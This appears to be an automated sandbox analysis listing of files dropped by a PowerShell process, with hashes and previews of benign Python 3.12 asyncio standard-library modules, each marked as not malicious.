                              Preview:.........U.f..........................2.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j...................Z.e.j...................Z.e.j...................Z...G.d...d.e.j...................e.j...........................Z...G.d...d.........Z.d.d.d.e.j ..................f.d...Z.d.d.d.e.j ..................d...d...Z.y.).)...create_subprocess_exec..create_subprocess_shell.....N.....)...events)...protocols)...streams)...tasks)...loggerc.....................L.......e.Z.d.Z.d.Z...f.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z...x.Z.S.)...SubprocessStreamProtocolz0Like StreamReaderProtocol, but for a subprocess.c.............................t...........|.....|.............|.|._.........d.x.|._.........x.|._.........|._.........d.|._.........d.|._.........g.|._.........|.j...................j...........................|._.........y.).N)...loopF)...super..__init__.._limit..stdin..stdout..stderr.._transport.._process_exited.._pipe_fds.._loop..create_future.._stdi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7966
                              Entropy (8bit):5.052449612660476
                              Encrypted:false
                              SSDEEP:96:8aBZ+UTW4uVGX3boU0/7Z94x4AVvK9BJ2bk7x9BEQ+UgJ3LwrY5+Jk8HL:8aVirVGHbXPmz9BJ2bkbBp+j7wr46r
                              MD5:0B0D95A663F09A57FBE4D996EE20F6FA
                              SHA1:C78A99283F551F606F01D3BB8C3B22972E5E813E
                              SHA-256:E8564A6C9E5FEF9ADBDEAF90FD3E411BE3BE5FA2EBE9B5B8DBCB4CBC1932F8EC
                              SHA-512:4752C12E722559BBCBAA783A07A4C8AF83839E2A934C1E3C132B68CEF22801A00226133C455D2F566B90CD222F206A5DF28511AB9F2EA40CEB2C935C1EBCF83F
                              Malicious:false
                              Preview:.........U.f.#........................@.....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.).)...TaskGroup.....)...events)...exceptions)...tasksc.....................R.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.d.d...d...Z.d.e.d.e.f.d...Z.d...Z.d...Z.y.).r....a9...Asynchronous context manager for managing groups of tasks... Example use:.. async with asyncio.TaskGroup() as group:. task1 = group.create_task(some_coroutine(...)). task2 = group.create_task(other_coroutine(...)). print("Both tasks have completed now.").. All tasks are awaited when the context manager exits... Any exceptions other than `asyncio.CancelledError` raised within. a task will cancel all remaining tasks and wait for them to exit.. The exceptions are then combined and raised as an `ExceptionGroup`.. c..........................d.|._.........d.|._.........d.|._.........d.|._.........d.|._.........d.|._.........t.................|._.........g.|._.....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40410
                              Entropy (8bit):5.355698424090167
                              Encrypted:false
                              SSDEEP:768:fUzd7mWOqwRn3J0IDjXpmNX7IdvIZaIeTUQ5jt7RWTXFU9Zq02yOX4SZdN5K:A7m3fVw8vCdQ5jtNWTXgqcWtK
                              MD5:900F7EF8B3312B915FE8FBAD430CFEBD
                              SHA1:82FDB135A8281A3A6B6D5D5EF4A6321C5A641BFB
                              SHA-256:E70F3CCA061AAB841E9BB8D4E604C781222B94876E2715680DE3681C28102429
                              SHA-512:5326E1B256A1CFA19A20E515EB41C89F7FF8BC21A4022DBEEC395273E7A7D8BCB47D9671678DDDC3FC4D3E7B8C13539F1E67470FB439004345A8C743D73D7EEE
                              Malicious:false
                              Preview:.........U.f...............................d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j&..................d.........j(..................Z.d/d...Z.d/d...Z.d...Z...G.d...d.e.j2..........................Z.e.Z...d.d.l.Z.e.j4..................x.Z.Z.d.d.d...d...Z.e.j"..................j@..................Z e.j"..................jB..................Z!e.j"..................jD..................Z"d.e"d...d...Z#d...Z$d...Z%d...Z&d...Z'd.d...d...Z(e.jR..................d...........Z*d/d...Z+d.d...d...Z,..G.d...d e.jZ..........................Z.d!d"..d#..Z/d$..Z0d%..Z1d&..Z2..e2e.........Z3..e.jh..........................Z5..e6........Z7i.Z8d'..Z9d(..Z:d)..Z;d*..Z<d+..Z=d,..Z>d-..Z?e.Z@e9ZAe:ZBe>ZCe?ZDe;ZEe<ZFe=ZG..d.d.l.m9Z9m:Z:m>Z>m?Z?m;Z;m<Z<m=Z=m5Z5m7Z7m8Z8m.Z...e.ZHe9ZIe:ZJe>ZKe?ZLe;ZMe<ZNe=ZOy.#.e.$.r...Y.....w.x.Y.w.#.e.$.r...Y.y.w.x.Y.w.)0z0Support for tasks, coroutines and
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1297
                              Entropy (8bit):5.415351090707412
                              Encrypted:false
                              SSDEEP:24:hpopsp94geTtRaPiXnN9PjcoWjYfKbZ6WCG7BuT1XOdGHNyxlSUw:Pzp9sna6XN9OjokMGABO6Nyz9w
                              MD5:3AF450E30ADDE54C1F3DC2E698D07B4D
                              SHA1:454ACEA27EB9A17195B51D42ED10C8BC5829B617
                              SHA-256:0CAA377429426F879525C42119174240A4F4496381BC184D0A0B42F3F2AFD129
                              SHA-512:7F39D4947AC560D2C813E8AD47E61A5AE5BAA321426F1B062F26C4545F65BC485E23A5E949B52CC7055EDB7D68ACDEF4B813829EB988C33FCDD5333C39E34F82
                              Malicious:false
                              Preview:.........U.f/...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d...Z.y.).z6High-level support for working with threads in asyncio.....N.....)...events)...to_threadc.........................K.....t.........j...........................}.t.........j...........................}.t.........j...................|.j...................|.g.|.....i.|.....}.|.j...................d.|...........d.{...........S.7.....w.).a....Asynchronously run function *func* in a separate thread... Any *args and **kwargs supplied for this function are directly passed. to *func*. Also, the current :class:`contextvars.Context` is propagated,. allowing context variables from the main thread to be accessed in the. separate thread... Return a coroutine that can be awaited to get the eventual result of *func*.. N).r......get_running_loop..contextvars..copy_context..functools..partial..run..run_in_executor)...func..args..kwargs..loop..ctx..func_calls.... .MC:\Users\boadi\AppData\Loca
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7836
                              Entropy (8bit):5.119169702626434
                              Encrypted:false
                              SSDEEP:96:Me6jaWnVRycKLTBqY7y7sNfkBtp1pZ4slWeoVwApKSkdqM0nltOqeBKXfoTGfo+X:Me6pVQcKvcRqVwAKSkdqjltleooor3
                              MD5:E5548A23D4CCABDBD1153BF4B89E0D20
                              SHA1:07A97D637E46645F641BE4EA180398A17481DD12
                              SHA-256:768C44B9892BEB97376248E23ECD32C0754C966974D6401F28ED9C5A7C8B0E92
                              SHA-512:8E9F7B8658B42E5390DF641C7878C7937AA4B915F7D0C05F80FDC80BC8AE7DC65892332CDAC2131951096B6A0C26C3567C91CF26BECF99E0E3D885EE5E0475C5
                              Malicious:false
                              Preview:.........U.fq...............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z...G.d...d.e.j...........................Z.e...G.d...d.................Z.d.e.e.....d.e.f.d...Z.d.e.e.....d.e.f.d...Z.y.)......N)...TracebackType)...final..Optional..Type.....)...events)...exceptions)...tasks)...Timeout..timeout..timeout_atc..................... .....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.y.)..._State..created..active..expiring..expired..finishedN)...__name__..__module__..__qualname__..CREATED..ENTERED..EXPIRING..EXPIRED..EXITED........NC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\timeouts.pyr....r........s..........G....G....H....G....Fr....r....c..........................e.Z.d.Z.d.Z.d.e.e.....d.d.f.d...Z.d.e.e.....f.d...Z.d.e.e.....d.d.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.d...Z.d.e.e.e.........d.e.e.....d.e.e.....d.e.e.....f.d...Z.d.d...Z.y.).r....z.Asynchronous context manager for cancelling overdue coroutines... Use `timeout()` or `t
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):14043
                              Entropy (8bit):5.155991593218318
                              Encrypted:false
                              SSDEEP:192:mIvugvhlK/JL7kgxWepAZ9UpihFOIDL8C9xjGD9BjS9GH:Zvugv2phpSIYxaD3eI
                              MD5:52F7BB6D14EDD73E0694AF7A1B6316C8
                              SHA1:F76EE9BBD5538FF0E0534BD47D466F43F439E9A8
                              SHA-256:F23B6FB9B4726588B99343060C361E210135672B4203F6B1431B487A7522DD6D
                              SHA-512:E77E7142F29C031E3511ECBEABBCAA48D3C01A7825BCAF3C6FFFE949777049E67EF3E01A41D19EDB0B679D76714A31AAF5EBE4B9C2BEE7C38D581BE02D682BD2
                              Malicious:false
                              Preview:.........U.f1+.............................d.Z.d.Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).z.Abstract Transport class.)...BaseTransport..ReadTransport..WriteTransport..Transport..DatagramTransport..SubprocessTransportc.....................<.....e.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....z.Base class for transports....._extraNc...........................|...i.}.|.|._.........y...Nr....)...self..extras.... .PC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\transports.py..__init__z.BaseTransport.__init__....s..........=....E............c.....................:.....|.j...................j...................|.|.........S.).z#Get optional transport information.).r......get).r......name..defaults.... r......get_extra_infoz.BaseTransport.get_extra_info....s..........{.{.....t.W..-..-r....c...........................t...........).z2Retu
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5118
                              Entropy (8bit):4.872473337402859
                              Encrypted:false
                              SSDEEP:96:Z5ulghtN76WQOUvToPc1f3O0DW93Y9VbDUGoGlU:Z0gh5Ubkqf3O0o34OElU
                              MD5:29D406C1C02B39EFAE7E7EC17F57F3AA
                              SHA1:DB451D91789B3047893D5E8EB70580608852D191
                              SHA-256:BA5A7B0E732D6A080860E1F25F34DB6DE40169D15B79D05BC823C6F91B9E9DD3
                              SHA-512:51F720B45B035B93D0C504C60EBF2C15CC5CE105B58658FB6E965A667FCD641D3B7165728BBE0EA6B0EB55F0F4D3D8493E68A77EC60F6468048BB368E0188783
                              Malicious:false
                              Preview:.........U.f.......................... .....d.d.l.Z...G.d...d.........Z.y.)......Nc..........................e.Z.d.Z.d.Z.d.Z.d.e.j...................f.d...Z.e.d...........Z.e.d...........Z.e.d...........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...TransportSocketz.A socket-like wrapper for exposing real transport sockets... These objects can be safely returned by APIs like. `transport.get_extra_info('socket')`. All potentially disruptive. operations (like "socket.close()") are banned.. ...._sock..sockc...........................|.|._.........y...Nr....)...selfr....s.... .LC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\trsock.py..__init__z.TransportSocket.__init__....s..................c...........................|.j...................j...................S.r....).r......family..r....s.... r....r....z.TransportSocket.family....s..........z.z.. .. .. r....c...........................|.j...................j..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):41578
                              Entropy (8bit):4.987358035527655
                              Encrypted:false
                              SSDEEP:768:PFQLoHRtLfPy8xgn+u1HSUc+YrMrPCxvJV3nxiwSvP/U1n:iLUtLfPGIUc+Ajxx+wJF
                              MD5:3582820DFDF1BC8F134A9E172A7590E3
                              SHA1:88FBE0A62D685EAA38326C8B0506F8D1535B3AF9
                              SHA-256:FFF0BCB9BA9641B5CD7FEABEBFB0F34BD128286EF0BDD44A8F6FBFE24B2B633F
                              SHA-512:2C7F541762ECFB80FCC8638B19052AF64C01AA8E22ECAF60903657E1B60E2ED97CBE2E8E29A9B806A0D978CD501149F38BC20B9897C0F5159E9C7F7A2C0CB767
                              Malicious:false
                              Preview:.........U.f...............................d.Z.d.d.l.Z.e.j...................d.k7..r...e.d...........d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.e.j6..................Z.e.j8..................Z.d.Z.d.Z.d.Z.d.Z ..G.d...d.e.jB..........................Z"..G.d...d.e.jB..........................Z#..G.d...d.e#........Z$..G.d...d.e#........Z%..G.d...d.e&........Z'..G.d...d e.jP..........................Z)..G.d!..d"e.jT..........................Z+..G.d#..d$........Z,..G.d%..d&e.jZ..........................Z.e)Z/..G.d'..d(e.j`..........................Z1..G.d)..d*e.j`..........................Z2e2Z3y.)+z.Selector and proactor event loops for Windows......N..win32z.win32 only)...partial.....)...events)...base_subprocess)...futures)...exceptions)...proactor_events)...selector_events)...tasks)...windows_utils)...logger)...SelectorEventLoop..Proact
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7377
                              Entropy (8bit):5.254574499827267
                              Encrypted:false
                              SSDEEP:96:fe1gZ4ewryeKwF56QCg5yFBcLJlwesyxZ/swKSsG7RZ2TKqiu0wv:GteEAeB5yFBcllVsW/gSZRmFiU
                              MD5:671FF9BB01B1CC1DE46D51F94212491D
                              SHA1:C7D0D1A4A05529DC3CC0CCB423F674A39BF13607
                              SHA-256:9083B51ACC5D3EB4742FB7D7575A2A93416B8ACAB7E26213767DFA4BEEEB90C6
                              SHA-512:3D3938DB156B208015FFD504F91355102CF21B4FAECC0986DBC69B5C3B402737B7A67F8C1BC989A64F1D00C16FBB0FE90FE7B82F781631131DA8B4DA014EB52A
                              Malicious:false
                              Preview:.........U.fq...............................d.Z.d.d.l.Z.e.j...................d.k7..r...e.d...........d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.e.j...................Z.e.j...................Z...e.j...........................Z.d.d.e.d...d...Z...G.d...d.........Z...G.d...d.e.j&..........................Z.y.).z)Various Windows specific bits and pieces......N..win32z.win32 only)...pipe..Popen..PIPE..PipeHandlei. ..F).TT)...duplex..overlapped..bufsizec..........................t.........j...................d.j...................t.........j...........................t.........t...................................}.|.r6t.........j...................}.t.........j...................t.........j...................z...}.|.|.}.}.n$t.........j...................}.t.........j...................}.d.|.}.}.|.t.........j...................z...}.|.d.....r.|.t.........j...................z...}.|.d.....r.t.........j...................}.n.d.}.d.x.}.}...t.........j...................|.|.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):79983
                              Entropy (8bit):4.278999613826372
                              Encrypted:false
                              SSDEEP:1536:vD1f1xBrs8GWPB0v41J7XLR+QQ8q7OAWJJ2Qu3DyEcy:vD1PU41J7XLR+H8q7OZmQu3+e
                              MD5:E4DA1F5E5B7267BA5CE63C72AE2B2901
                              SHA1:44219D357396F048941417C48D9B83A2B9629BC4
                              SHA-256:C0FC43FEC379C16C699FF752D796F320DB23DB4FEDE62DDAA425621F8D40E091
                              SHA-512:F626C4A7CEA54B1AB8FF5F40CDBBBB635D22BB757BEF75CE398F790D10C90886E9BD6E7F198E228B61388115166FD517F521C9F97C2773645B176828DA91C4BD
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Base implementation of event loop.....The event loop can be broken up into a multiplexer (the part..responsible for notifying us of I/O events) and the event loop proper,..which wraps a multiplexer with functionality for scheduling callbacks,..immediately or at a given time in the future.....Whenever a public API takes a callback, subsequent positional..arguments will be passed to the callback if/when it is called. This..avoids the proliferation of trivial lambdas implementing closures...Keyword arguments for the callback are not supported; this is a..conscious design decision, leaving the door open for keyword arguments..to modify the meaning of the API call itself..."""....import collections..import collections.abc..import concurrent.futures..import errno..import functools..import heapq..import itertools..import os..import socket..import stat..import subprocess..import threading..import time..import traceback..import sys..import warnings..import weakref....try:.. import ssl..e
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2041
                              Entropy (8bit):4.759846621359345
                              Encrypted:false
                              SSDEEP:48:bNCRipB7FG3NtCPfOM3TW+yWzpbhTPUXUKyRbb2ubp:bN1euZPzpbp/H2uF
                              MD5:E6FEE06D3293BF447C5319CF7E90253C
                              SHA1:E3B23D2010282969C9B519B14A7AE0DC0E48F88F
                              SHA-256:0810F0D05A8BB85DFD42FE17A93949B7C425D1E6E2BC21D35EB56A1895923591
                              SHA-512:4544DACF5D25ADCA0E341BEBF116E50BF20180025DB97A3F1A82BF91B373D8A784044A5D4E93DADA1F76C81C2B51944CAD2EF496C06178A001A91A783C079A0B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:__all__ = ()....import reprlib....from . import format_helpers....# States for Future..._PENDING = 'PENDING'.._CANCELLED = 'CANCELLED'.._FINISHED = 'FINISHED'......def isfuture(obj):.. """Check for a Future..... This returns True when obj is a Future instance or is advertising.. itself as duck-type compatible by setting _asyncio_future_blocking... See comment in Future for more details... """.. return (hasattr(obj.__class__, '_asyncio_future_blocking') and.. obj._asyncio_future_blocking is not None)......def _format_callbacks(cb):.. """helper function for Future.__repr__""".. size = len(cb).. if not size:.. cb = ''.... def format_cb(callback):.. return format_helpers._format_callback_source(callback, ()).... if size == 1:.. cb = format_cb(cb[0][0]).. elif size == 2:.. cb = '{}, {}'.format(format_cb(cb[0][0]), format_cb(cb[1][0])).. elif size > 2:.. cb = '{}, <{} more>, {}'.format(format_cb(cb[0][0]),..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):9154
                              Entropy (8bit):4.246808313092359
                              Encrypted:false
                              SSDEEP:96:lszIZ8MLHzG3Brs9pIKrlNtdpnqxfPx1BKV2icfn/CfcrPQh/Km:zZxK3pYplNtdNO74sn//PQh/5
                              MD5:71590A7A9F7AADD1CCA4016CADC4762B
                              SHA1:4D7722FE0221A2E3AAA42496DE2521DE53DE7C17
                              SHA-256:0E07C6D91C88E3F2E587E5EDCEB9F14D6C9AFDF9F55BCDBC6610AD1BCDE93DF7
                              SHA-512:8A6BEFE6EC48F87184B355B9DC59F6540DDEA2F356B9FFD60E903229640874CB210E9F1945219D88C7C8FD6970260B4C34CD98F399ACC9A42ECFED3B84EE42C2
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:import collections..import subprocess..import warnings....from . import protocols..from . import transports..from .log import logger......class BaseSubprocessTransport(transports.SubprocessTransport):.... def __init__(self, loop, protocol, args, shell,.. stdin, stdout, stderr, bufsize,.. waiter=None, extra=None, **kwargs):.. super().__init__(extra).. self._closed = False.. self._protocol = protocol.. self._loop = loop.. self._proc = None.. self._pid = None.. self._returncode = None.. self._exit_waiters = [].. self._pending_calls = collections.deque().. self._pipes = {}.. self._finished = False.... if stdin == subprocess.PIPE:.. self._pipes[0] = None.. if stdout == subprocess.PIPE:.. self._pipes[1] = None.. if stderr == subprocess.PIPE:.. self._pipes[2] = None.... # Create the child process: set the _proc attribute..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2766
                              Entropy (8bit):4.3810657729743125
                              Encrypted:false
                              SSDEEP:48:MDlb5wrzh0hBDgNuheP0PxxbycJw2O+wJouDpi4w8L2WvK7:MDl9kz6dg4gPw9ycJw2luD3w8L2yw
                              MD5:E99B961F73887CC1085158CA75524175
                              SHA1:E78A72B15598531C2526C8D1A832C6DF14108846
                              SHA-256:109DE315ED020E85261B741987719CFD3888F14BC9DDA9C846BDA3ECB6B24B4A
                              SHA-512:D6B87AC813EFFE058197D5A80033FF78EDA3C6ACE561C461048031FAED60CA5C49E156D145B247E4832BD2C6593CD161F59F5B7DB7629E5CECA5E2E5D20A1894
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:import linecache..import reprlib..import traceback....from . import base_futures..from . import coroutines......def _task_repr_info(task):.. info = base_futures._future_repr_info(task).... if task.cancelling() and not task.done():.. # replace status.. info[0] = 'cancelling'.... info.insert(1, 'name=%r' % task.get_name()).... if task._fut_waiter is not None:.. info.insert(2, f'wait_for={task._fut_waiter!r}').... if task._coro:.. coro = coroutines._format_coroutine(task._coro).. info.insert(2, f'coro=<{coro}>').... return info......@reprlib.recursive_repr()..def _task_repr(task):.. info = ' '.join(_task_repr_info(task)).. return f'<{task.__class__.__name__} {info}>'......def _task_get_stack(task, limit):.. frames = [].. if hasattr(task._coro, 'cr_frame'):.. # case 1: 'async def' coroutines.. f = task._coro.cr_frame.. elif hasattr(task._coro, 'gi_frame'):.. # case 2: legacy coroutines.. f = tas
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1454
                              Entropy (8bit):5.367936833312057
                              Encrypted:false
                              SSDEEP:24:lOkxD1CxjkkazhtNRHQVTLHhAWyVUqb1j+MMzV730JGvHApb/f:4kxJXhtD6hAWY7RCM2T0JGvHKf
                              MD5:BBB0FAB3785CCA738C7606C3621377E7
                              SHA1:55E9A98EA91C99FA1DD556736C772AF4B30B999E
                              SHA-256:A577B5C92227F378A26048E1985821E973125B42C385A5AA4A44BB92B2C6F26E
                              SHA-512:7F45394870FF89170020D5B45FC4DE3F3C481B7493C199336D8E279F479D7F05A96727A87DB151FF14D14B1A74A3EB241CBB7D8C4D152B21F83126613FFA60EB
                              Malicious:false
                              Preview:# Contains code from https://github.com/MagicStack/uvloop/tree/v0.16.0..# SPDX-License-Identifier: PSF-2.0 AND (MIT OR Apache-2.0)..# SPDX-FileCopyrightText: Copyright (c) 2015-2021 MagicStack Inc. http://magic.io....import enum....# After the connection is lost, log warnings after this many write()s...LOG_THRESHOLD_FOR_CONNLOST_WRITES = 5....# Seconds to wait before retrying accept()...ACCEPT_RETRY_DELAY = 1....# Number of stack entries to capture in debug mode...# The larger the number, the slower the operation in debug mode..# (see extract_stack() in format_helpers.py)...DEBUG_STACK_DEPTH = 10....# Number of seconds to wait for SSL handshake to complete..# The default timeout matches that of Nginx...SSL_HANDSHAKE_TIMEOUT = 60.0....# Number of seconds to wait for SSL shutdown to complete..# The default timeout mimics lingering_time..SSL_SHUTDOWN_TIMEOUT = 30.0....# Used in sendfile fallback code. We use fallback for platforms..# that don't support sendfile, or for TLS connections..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3451
                              Entropy (8bit):4.549456018985705
                              Encrypted:false
                              SSDEEP:48:I+hQMzMBTJpOqy6f86c7XFNry/ORKsoSSS35prVq/sP0O4H2aFEhU:FhQMzmTJpOl6E6F/gKsgDspiEhU
                              MD5:0EC37E7EAB161709F0703A323DB49B5D
                              SHA1:08D953E48993A59A7AE54BAC31387699EAB57715
                              SHA-256:0CC38E59C555C22CA601AED90A4065E2B7C56EFE8B8EF6A693F4D0426E45D76A
                              SHA-512:020F23FCAD07CC15DBF2170C93F68D737614DB4BE6C42F42417647A83D32625DF1A1CE390293A01DD0D4158267A2C8C1CF13B7008F5577CA8172376FA9E9636E
                              Malicious:false
                              Preview:__all__ = 'iscoroutinefunction', 'iscoroutine'....import collections.abc..import inspect..import os..import sys..import types......def _is_debug_mode():.. # See: https://docs.python.org/3/library/asyncio-dev.html#asyncio-debug-mode... return sys.flags.dev_mode or (not sys.flags.ignore_environment and.. bool(os.environ.get('PYTHONASYNCIODEBUG')))......# A marker for iscoroutinefunction..._is_coroutine = object()......def iscoroutinefunction(func):.. """Return True if func is a decorated coroutine function.""".. return (inspect.iscoroutinefunction(func) or.. getattr(func, '_is_coroutine', None) is _is_coroutine)......# Prioritize native coroutine check to speed-up..# asyncio.iscoroutine..._COROUTINE_TYPES = (types.CoroutineType, collections.abc.Coroutine).._iscoroutine_typecache = set()......def iscoroutine(obj):.. """Return True if obj is a coroutine object.""".. if type(obj) in _iscoroutine_typecache:.. return True...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):30207
                              Entropy (8bit):4.503601678489958
                              Encrypted:false
                              SSDEEP:384:G6h/n+ARDPUvN7NcD+f2B4XAZ8AzL23EbZhB5xOV+yRWWePoWFg:G6hv+ImJcD+fTXApG34ZhB52+mWWtWFg
                              MD5:B41C12F1A5E0B6365977DC69ABFF9A25
                              SHA1:3E52F2B03C11C90E861505F87CB47644C4EA3417
                              SHA-256:F9A88DE38355AD2F6B5F0DE70DBD4694DA0D9F92831734868C026DAA4CAF8F54
                              SHA-512:F4DFAFE3B969A67CF12F3FB331094887CC8ECECA99B35C329C94A060032F4F65764F8C5AC7081849224036FE80BA2EE270E772CFBEBEBC768156FB52E722E653
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Event loop and event loop policy."""....# Contains code from https://github.com/MagicStack/uvloop/tree/v0.16.0..# SPDX-License-Identifier: PSF-2.0 AND (MIT OR Apache-2.0)..# SPDX-FileCopyrightText: Copyright (c) 2015-2021 MagicStack Inc. http://magic.io....__all__ = (.. 'AbstractEventLoopPolicy',.. 'AbstractEventLoop', 'AbstractServer',.. 'Handle', 'TimerHandle',.. 'get_event_loop_policy', 'set_event_loop_policy',.. 'get_event_loop', 'set_event_loop', 'new_event_loop',.. 'get_child_watcher', 'set_child_watcher',.. '_set_running_loop', 'get_running_loop',.. '_get_running_loop',..)....import contextvars..import os..import signal..import socket..import subprocess..import sys..import threading....from . import format_helpers......class Handle:.. """Object returned by callback registration methods.""".... __slots__ = ('_callback', '_args', '_cancelled', '_loop',.. '_source_traceback', '_repr', '__weakref__',.. '_context')....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1814
                              Entropy (8bit):4.664597808201475
                              Encrypted:false
                              SSDEEP:24:Ad3QZbzX+MkvODzN3Z1zULxID+XvsaAWl2iyjDzPfgEBF6R9TaAs3hxER:iAJrzOMXzULxy+/sa/l2nzP4EMaBhxER
                              MD5:23C13351D6533C00C8E7707467D75E8A
                              SHA1:DEBE33F3B0AD9A330B90B2271E737646839814BE
                              SHA-256:A49AA2489262C47EE91528550EF464F1139E873DD5F1A3F18C3C099A0145E195
                              SHA-512:4D7AA609DCEFF0879B42B02C5985A550E85AD8B78AA33C0A3744B2DEC303BFAB7BD6D27662BC1B816E346E49B9466D6913F93B7D2ED10165C83AC261DEECC31A
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""asyncio exceptions."""......__all__ = ('BrokenBarrierError',.. 'CancelledError', 'InvalidStateError', 'TimeoutError',.. 'IncompleteReadError', 'LimitOverrunError',.. 'SendfileNotAvailableError')......class CancelledError(BaseException):.. """The Future or Task was cancelled."""......TimeoutError = TimeoutError # make local alias for the standard exception......class InvalidStateError(Exception):.. """The operation is not allowed in this state."""......class SendfileNotAvailableError(RuntimeError):.. """Sendfile syscall is not available..... Raised if OS does not support sendfile syscall for given socket or.. file type... """......class IncompleteReadError(EOFError):.. """.. Incomplete read error. Attributes:.... - partial: read bytes string before the end of stream was reached.. - expected: total number of expected bytes (or None if unknown).. """.. def __init__(self, partial, expected):.. r_expected = 'undefi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2480
                              Entropy (8bit):4.6056367555974065
                              Encrypted:false
                              SSDEEP:48:g863N4N9017WBmO9uMxP6U8QtUUIKOxYJCd67PiJQUhAs42eDv4mQ0L0j:g863NC9IiBmKxiUlWVKPJCs7oQUhANLi
                              MD5:64D0BFEF9B45C0EA83D954360F021869
                              SHA1:1BD55E0614613C37EADBD77188962F3BD5F28E30
                              SHA-256:657449627E8706CDC28A575DF9E975058E787FA2CC6A70B5DA7F9EB39D371DCB
                              SHA-512:23583958AAFD449B0B9991A0CFE569092D22684464F4DB3400C8E56B22CE127C0E73E94D59C976ECC40A70F2FE850164DF7AAB1A147629AF45BC7145B1C6BE9D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
